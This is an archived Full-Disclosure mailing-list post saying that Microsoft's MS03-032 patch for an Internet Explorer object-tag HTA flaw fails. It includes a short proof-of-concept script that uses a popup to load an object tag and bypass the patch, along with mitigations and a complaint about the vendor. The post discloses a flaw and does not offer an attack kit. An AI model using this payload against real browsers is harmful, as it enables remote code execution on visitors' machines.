SecurityvulnsSECURITYVULNS:DOC:5063[Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
Since the cat somehow got out of the bag, and more importantly, this
is so blatantly obvious, herewith is the "Bad News":
The patch for Drew's object data=funky.hta doesn't work:
http://www.malware.com/badnews.html
<script>
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object data=ouch.php>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>
Notes:
-
Disable Active Scripting
-
In case that does not work, uninstall Internet Explorer
-
http://www.eeye.com/html/Research/Advisories/AD20030820.html
-
This was sent to the manufacturer quite some time prior to this
going out. Surprisingly no immediate acknowledgement -
This is so blatantly obvious, in particular because it is
the coupling of two known issues[one current + one from 2002]:
It is beyond comprehension why this was not checked from the
outset as it is a known issue plus file://::{CLSID}in the control
panel in the object tag still functions to date.
6. At this stage one must really question the compentency of this
particular operation. This is a pathetic oversight.
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html